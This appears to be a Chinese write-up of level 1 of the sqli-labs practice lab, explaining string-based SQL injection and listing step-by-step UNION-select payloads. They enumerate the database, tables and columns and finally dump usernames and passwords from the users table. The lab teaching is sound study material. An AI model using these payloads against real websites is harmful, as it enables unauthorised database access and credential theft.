Sqllab第一关通关笔记

知识点:

明白数值注入和字符注入的区别

  •         数值注入:通过数字运算判断,1/0 1/1
  •         字符注入:通过引号进行判断,奇数个和偶数个单引号进行识别

联合查询:union 或者 union all 

  • 需要满足字段数一致,否则报错
  • 将输入数据和查询数据进行格式整合然后输出

group_concat()

  • group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )
  • []中内容为可选内容
  • distinct:去重
  • 先分组再合并,将格式分组后的字符串合并成一个长字符串;默认分隔符为逗号

concat()

  • 将多个字符串拼接成一个字符串;只是将对应字段数据按格式合并形成新的字段数据;数据有多个
  • 没有分隔符

concat_ws(分隔符,字符串)

  • 将多个字符串拼接成一个字符串;只是将对应字段数据按格式合并形成新的字段数据;数据有多个
  • 可以设定分隔符,第一个变量为分隔符数据

第一步 测试是否存在sql注入点

利用bp进行抓包测试发现存在sql注入;

构造id=2' 发现数据库报错,但是id=2'' 却不报错;这里应该存在字符型sql注入;

而且查询语句应该是 select 1,2,3 from 表名 where id = '输入信息' limit 0,1

1,2,3表示字段名;应该是2个或3个字段;

第二步 测试注入点的查询规则

既然知道了这里存在注入点下面就开始对它进行注入

构造payload:id=0'+or+1=1--+

发现只返回了一条数据;应该是输出格式限制了;只能显示一条数据

构造payload:id=0'+or+1=0--+

发现什么也没有;这说明条件为假时返回为空

第三步 测试原语句中的查询字段数

好了,整体的查询语句应该就是我上面写的那个;字段数不确定,现在测试一下查询的字段数;

构造payload:id=0'+union+select+1+--+

发现提示字段数量不对

猜测字段数量为3

构造payload:id=0'+union+select+1,2,3+--+

成功出结果了;说明原查询语句中字段数为3;而且输入信息被打印出来了;

有回显说明可以直接查询到一些关键信息,不用再bp爆破了

第四步 利用联合查询查找数据库名和版本信息

构造payload:id=0'+union+select+1,database(),version()+--+

界面显示除了数据库名字和版本信息

第五步 查询指定数据库下的表信息

接下来开始查询数据库下面有几张表

构造payload:id=0'+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='security'+--+

第六步 查询表中的字段信息

发现有一张表为users;这应该是用户表;存放用户的相关信息;那就找一下这张表的字段名有哪些吧

构造payload: id=0'+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_name='users'+--+

发现输出了一堆字段名;里面有username和password字段;这应该是比较关键的信息;

第七步 查询指定字段的数据

查询users表中的username和password的信息;

构造payload:id=0'+union+select+1,2,group_concat('*',username,':',password)+from+users+--+

用户名和密码信息都被打印出来了

10

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/744130.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SAR洪水检测分析

对于洪水检测,经常使用合成孔径雷达 (SAR) 卫星图像。这里显示了 SAR 图像用于洪水检测的优缺点。 优点: - 无论天气如何,都能够捕获图像,从而实现高时间分辨率。 - 由于镜面反射,很容易区分水和其他物体。 缺点: - 图像中有很多斑点噪声。 - 凭直觉很难理解图像中出现…

机界先锋:Figure 01实现全面沟通与AGI通用人工智能的征途

✨✨ 欢迎大家来访Srlua的博文(づ ̄3 ̄)づ╭❤~✨✨ 🌟🌟 欢迎各位亲爱的读者,感谢你们抽出宝贵的时间来阅读我的文章。 我是Srlua小谢,在这里我会分享我的知识和经验。&am…

yum安装mysql 数据库tab自动补全

centos7上面没有mysql,它的数据库名字叫做mariadb [rootlocalhost ~]#yum install mariadb-server -y [rootlocalhost ~]#systemctl start mariadb.service [rootlocalhost ~]#systemctl stop firewalld [rootlocalhost ~]#setenforce 0 [rootlocalhost ~]#ss -na…

代码随想录三刷day29

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、力扣455. 分发饼干二、力扣376. 摆动序列三、力扣53. 最大子数组和 前言 贪心的本质是选择每一阶段的局部最优,从而达到全局最优。 一、力扣45…

2024年大学生买腾讯云_腾讯云大学生服务器优惠

腾讯云学生服务器优惠活动「云校园」轻量应用服务器2核2G学生价30元3个月、58元6个月、112元一年,轻量应用服务器4核8G配置112元3个月、352.8元6个月、646.8元一年,CVM云服务器2核4G3M公网带宽配置842.4元一年,腾讯云服务器网txyfwq.com分享2…

H12-811_128

128.如下图所示的网络,两台交换机之间通过四条链路相连,COPPER指电接口,FIBR指光接口,则以下哪两个接口可以实现链路聚合? A.G0/0/3和FE0/0/3 B.G0/0/3和G0/0/2 C.G0/0/2和FE0/0/3 D.G0/0/2和G0/0/1 答案:BD 注释&am…

Mysql 死锁案例2-间隙锁与意向插入锁冲突

死锁复现 CREATE TABLE t (id int(11) NOT NULL,c int(11) DEFAULT NULL,d int(11) DEFAULT NULL,PRIMARY KEY (id),KEY c (c) ) ENGINEInnoDB DEFAULT CHARSETutf8;/*Data for the table t */insert into t(id,c,d) values (0,0,0),(5,5,5),(10,10,10) 事务1事务2T1START …

coingecko获取token price --php版

1.创建一个数据表 DROP TABLE IF EXISTS txzh_token_price; CREATE TABLE txzh_token_price (id int(11) NOT NULL AUTO_INCREMENT,token_ids varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci NULL DEFAULT NULL COMMENT 币种id,symbol varchar(255) CHARACT…

大模型在自动驾驶决策系统中的前沿应用

摘要: 本文主要探讨了大模型在自动驾驶决策系统中的前沿应用,包括背景、核心技术和应用场景。自动驾驶决策系统是自动驾驶技术的核心组成部分,而大模型的应用为决策系统提供了强大的计算能力和决策能力。本文首先介绍了自动驾驶决策系统的重…

项目部署遇到的问题

nginx反向代理配置 location /api/ {proxy_set_header Host $http_host;proxy_set_header X-Real-IP $remote_addr;proxy_set_header REMOTE-HOST $remote_addr;proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;proxy_pass http://localhost:8083/;}# 刷新页面40…

英语同传翻译,北京本地同声传译收费价格多少

同声传译是一项高度专业化的服务,广泛应用于国际会议、商务洽谈、法庭审判等场合。由于其对译员的语言能力、专业知识以及应变能力的极高要求,使得同声传译的收费价格也相对较高。那么,英语同传翻译北京本地同声传译的收费价格到底是多少呢&a…

Likeshop多商户高级商城系统已上线,支持DIY页面设计,打造个性化商城!

Likeshop多商户高级商城系统来啦!这是一款功能强大、灵活多样的电商平台解决方案,旨在为企业提供一站式的多渠道商城搭建服务。该系统支持多种经营模式,包括平台自营、联营、招商等,为企业提供了丰富的运营选择。无论运营还是二开…

el-menu + el-badge 菜单加红点标识el-badge

el-menu el-badge 菜单加红点标识el-badge 一、el-menu组件menu/index.vuemenu/submenu.vue 二、获取/更新菜单红点标识 main.js引入全局组件/mixins全局混入 el-menu封装 一、el-menu组件 menu/index.vue 重点:定义 ref"menu",切换路由时…

【原创】浅谈银行票据ABS的几种模式

前 言 2017年6月20日,中国票据网宣布下线,这位承载着无数票据人回忆的老朋友虽然离开了大家,但是**以票据类资产作为基础资产在沪深证券交易所发行的资产支持证券(以下简称“票据ABS”)**却方兴未艾,自201…

Ajax(2)

图片上传 传图片文件不能像传文字一样用JSON格式,可以用form-data类型携带文件 1.获取图片文件对象 2.使用FormData(浏览器内置的构造函数)携带图片文件 3.提交表单数据到服务器,返回图片网址 这里可能用到的事件监听器&#…

低功耗漏电保护电路芯片D54123B介绍

概 述 A)、D54123B是一款高性能 CMOS 漏电保护器专用电路。芯片内部包含稳压电源、放大电路、比较器电路、延时电路、计数器电路、跳闸控制电路及跳闸驱动电路。芯片外围应用有脱扣线圈、压敏电阻、稳压二级管、二级管、电阻、电容等元器件。 B)、内部…

权限管理系统-0.4.1

5.4 权限管理前端开发 5.4.1 src/components 新建ParentView文件夹&#xff0c;并在文件夹中新建index.vue文件。 并在index.vue中加入以下内容&#xff1a; <template><router-view /> </template>5.4.2 layout/components/Sidebar/index.vue routes() …

金蝶云星空对接打通阿里宜搭逐个单据查询接口与新增表单实例接口

金蝶云星空对接打通阿里宜搭逐个单据查询接口与新增表单实例接口 数据源平台:金蝶云星空 金蝶K/3Cloud结合当今先进管理理论和数十万家国内客户最佳应用实践&#xff0c;面向事业部制、多地点、多工厂等运营协同与管控型企业及集团公司&#xff0c;提供一个通用的ERP服务平台。…

5.58 BCC工具之mysqld_qslower.py解读

一,工具简介 mysqld_qslower工具用于追踪 MySQL 服务器提供的查询,并打印出那些超过延迟(查询时间)阈值的查询。默认情况下,使用的阈值为 1 毫秒。 二,代码示例 #!/usr/bin/env pythonfrom __future__ import print_function from bcc import BPF, USDT import sys# a…

网络编程:网络编程基础

一、网络发展 1.TCP/IP两个协议阶段 TCP/IP协议已分成了两个不同的协议&#xff1a; 用来检测网络传输中差错的传输控制协议TCP 专门负责对不同网络进行2互联的互联网协议IP 2.网络体系结构 OSI体系口诀&#xff1a;物链网输会示用 2.1网络体系结构概念 每一层都有自己独…